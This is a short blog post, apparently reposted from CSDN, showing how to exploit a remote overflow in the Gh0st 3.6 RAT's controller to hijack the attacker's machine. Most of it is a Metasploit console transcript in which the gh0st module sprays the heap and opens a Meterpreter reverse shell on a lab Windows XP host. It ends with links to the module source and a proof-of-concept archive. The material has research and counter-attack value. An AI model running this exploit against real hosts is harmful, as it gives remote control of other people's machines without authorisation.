title: Using the Gh0st 3.6 remote overflow vulnerability to reverse-control the attacker
comments: true
toc: true
categories:
- [Metasploit]
- [Exp]
tags:
- Metasploit
- Overflow
- Gh0st
date: 2020-01-12 18:30:10
abbrlink: 30568
Preface
The proof of concept for this vulnerability was published in 2017, but in fact several Gh0st overflow vulnerabilities had already been disclosed back in 2009.
This shows that using an open-source C2 tool is not necessarily safe. It is best to modify it yourself; merely applying AV evasion will not protect you.
MSF
Tested on WinXP at 2017-09-15
Run the Gh0st client, then use MSF to trigger the overflow on the C2 client machine; this yields a reverse session on the attacker's machine.
```text
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set RHOST 192.168.1.126
RHOST => 192.168.1.126
msf exploit(gh0st) > run
[*] Started reverse TCP handler on 192.168.1.125:4444
[*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6
[*] 192.168.1.126:80 - Spraying heap...
[*] 192.168.1.126:80 - Trying command 103...
[*] Sending stage (957999 bytes) to 192.168.1.126
[*] Meterpreter session 1 opened (192.168.1.125:4444 -> 192.168.1.126:1070) at 2017-09-15 16:22:56 +0800
[*] 192.168.1.126:80 - Server closed connection
meterpreter > sysinfo
Computer : K8ANTI-B2B9B81C
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```
EXP
https://github.com/rapid7/metasploit-framework/blob/be66ed8af3c355b1280e1a2bdbe5dd1a74e7bc58/modules/exploits/windows/misc/gh0st.rb
https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip
Source: CSDN
Author: k8gege
Link: https://blog.csdn.net/k8gege/article/details/103949242